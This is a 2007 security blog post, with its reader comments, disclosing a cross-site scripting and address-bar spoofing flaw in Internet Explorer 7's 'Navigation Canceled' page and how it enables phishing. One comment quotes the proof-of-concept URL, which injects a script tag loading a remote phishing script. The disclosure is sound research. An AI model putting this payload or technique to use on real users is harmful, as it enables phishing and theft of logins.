If at first you don't succeed; call it version 1.0
Wednesday, March 14, 2007

Summary
Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users.

Affected versions
• Windows Vista - Internet Explorer 7.0
• Windows XP - Internet Explorer 7.0

Technical Details
The navcancl.htm local resource is used by the browser when for some reason a navigation to a specific page is canceled.
When a navigation is canceled the URL of the specific page is provided to the navcancl.htm local resource after the # sign. For example: res://ieframe.dll/navcancl.htm#http://www.site.com.  The navcancl.htm page then generates a script in the “Refresh the page.” link in order to reload the provided site again when the user clicks on this link.
It is possible to inject a script in the provided link which will be executed when the user clicks on the “Refresh the page.” link.
Luckily, Internet Explorer now runs most of its local resources (including navcancl.htm) in “Internet Zone”, so this vulnerability cannot be exploited to conduct a remote code execution.

Unfortunately, there is also a design flaw in IE7. The browser automatically removes the URL path of the local resource and leaves only the provided URL. For example: when the user visits res://ieframe.dll/navcancl.htm#http://www.site.com, IE7 will show http://www.site.com in the address bar.

To perform a phishing attack, an attacker can create a specially crafted navcancl.htm local resource link with a script that will display a fake content of a trusted site (e.g. bank, paypal, MySpace).
When the victim will open the link that was sent by the attacker, a “Navigation Canceled” page will be displayed. The victim will think that there was an error in the site or some kind of a network error and will try to refresh the page. Once he will click on the “Refresh the page.” link, The attacker’s provided content (e.g. fake login page) will be displayed and the victim will think that he’s within the trusted site, because the address bar shows the trusted site’s URL.


Proof-of-Concept

A CNN.com article spoofing proof-of-concept can be found here.
If you are not using IE7, you can watch a demonstration video here.

Workaround / Suggestion
Until Microsoft fixes this vulnerability, do not trust the “Navigation Canceled” page!

 


Wednesday, March 14, 2007 11:47:09 AM UTC | Comments [20] | Security#
Thursday, March 15, 2007 8:18:39 AM UTC
A phishing success with this trick is very improbable
Thursday, March 15, 2007 9:47:20 AM UTC
Why?
If people click on "Yes" buttons which install malware, why won't they click on on a refresh link of an error page (with a trusted site URL in the address bar) and believe it's their trusted site?
Thursday, March 15, 2007 1:14:57 PM UTC
How can be trusted a site with this long URL I see in my IE7 url bar???
"http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document"

And if I click on the URL bar I can also see this full URL:
"http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document.write('<script%20src=\'http://www.raffon.net/research/ms/ie/navcancl/phish.js\'></script>');//"

Sorry, but this phishing attack is very improbable!

Thursday, March 15, 2007 1:38:03 PM UTC
Usually people do not pay attention for the URL that is not displayed within the visible address bar.
They will trust it if they see an accpetable domain name.
Thursday, March 15, 2007 4:34:27 PM UTC
Is it possible that you provide us the full source code?
I just want to try some things to verifiy this issue.

Enjoy,

Christian
Thursday, March 15, 2007 4:35:30 PM UTC
Do you really think this URL is accpetable?
"http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document"
ROTFL
Thursday, March 15, 2007 5:21:35 PM UTC
@Chrisitan:
The proof-of-concept source code is public. The only thing that is not public is redc.aspx which only redirects to the navcancl.htm local resource. Just use a sniffer (e.g. Fiddler) to grab the response's location header.

@luc:
This was just an example. The phisher can use whatever URL prefix he want.
Thursday, March 15, 2007 6:23:06 PM UTC
1. The user when click on that page sees the page doesn't work, so he's allerted and I assume he takes attention to the URL and check if that is correct.
2. The phisher have to write a long URL in order to hide the javascript code, but a long URL is always suspect, I'll never put my password in a crazy long URL.
3. The IE7 Antiphishing filter still continue to work and so that phishing site will be blocked by antiphishing filter, although the page is spoofed.
So, there're a lot of things that make this attack success very improbable
Thursday, March 15, 2007 6:33:04 PM UTC
1. He we'll be alerted and will probably try to refresh the page as suggested by the browser.
2. A long URL is something trivial, and used by many trusted sites.
3. The Antiphishing tool will not work, as the page runs locally. Unless MS will flag the navcancl.htm local resource which is unlikely.
Thursday, March 15, 2007 8:01:39 PM UTC
You're wrong, the page runs in Internet zone and the phishing filter works!!!
Thursday, March 15, 2007 8:27:10 PM UTC
Indeed. Since IE6 SP2, all local resources are running under "Internet Zone". This is the reason, by the way, why this vulnerability cannot be exploited for remote code execution.
But, that doesn't mean MS will flag the navcancl.htm local resource, which in this case makes the Anti-Phishing tool useless.
Friday, March 16, 2007 8:48:57 AM UTC
Anti-phishing filter verifies any http web site loaded in a page and in your PoC this URL 'http://www.raffon.net/research/ms/ie/navcancl/phish.js is checked by Antiphishing filter
Sunday, March 18, 2007 8:40:27 AM UTC
@casut:
My response for your last comment can be found here: http://aviv.raffon.net/2007/03/18/IE7AntiphishingToolAndExternalScripts.aspx
Wednesday, April 04, 2007 1:42:38 PM UTC
Hello

I'm very interesting to know if this problem has been solved with a fix or an update provided by Microsoft.

Tanks
Friday, April 13, 2007 5:29:55 PM UTC
It's a fascinating attack. Does this also allow the spoofing of sites using the so-called Extended Validation certificate (the green address bar)?
Friday, July 20, 2007 9:16:21 AM UTC
Hi.
I'm searching for answers and solution for a problem in my pc, since some days ago.
When i star my browser (IE7 or Maxthon) with a configurated group of 8 diferent pages, only two of them open normally, the other six pages return that screen with "Navigation to the website was canceled" and a single link to "Refresh the Page".
There is a strange separation between those two situations... the URLs of the two pages who can be seen is "https://..." and the blocked pages are all "http://..." pages!

Is this some kind of problem related with this?
And now, how can i fix this? I can not navigate any more!!!
Please, anyone who knows can help me?

(Sorry for my poor english)
Best regards,
Milenio
Friday, July 20, 2007 10:38:38 AM UTC
You can find information about this issue on the IE team blog: http://blogs.msdn.com/ie/archive/2007/05/16/follow-up-to-internet-explorer-may-2007-security-update.aspx
Tuesday, July 24, 2007 5:52:50 AM UTC
Hi, i've recently had the a problem running a hyperlink from a site i know i can trust. My widows vista HP Pavilion Entertainment PC's, security sytem MIGHT BE canceling the page from showing up and its says the navigation to this webpage was canceled. My options then is refresh but when i do, it says the program cannot display the webpage. Please give me some advice how to fix this problem and be able to view this webpage!
Thanks.
Monday, July 14, 2008 9:24:26 AM UTC
compose mail can 't open in my outlook web acess if i open means red mark simple is appear i m using windows vista .........
Wednesday, July 23, 2008 7:45:46 PM UTC
I have the same problem. I do a lot of business thru Facebook and Myspace and now I can't use them. I know those are typical warning sites for phising but I have no idea how to get these sites back without a proxy.
Comments are closed.     
Send me an Email
Follow me on Twitter
RSS Feeds
  
Blogroll
Archive
Admin Login
Sign In
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.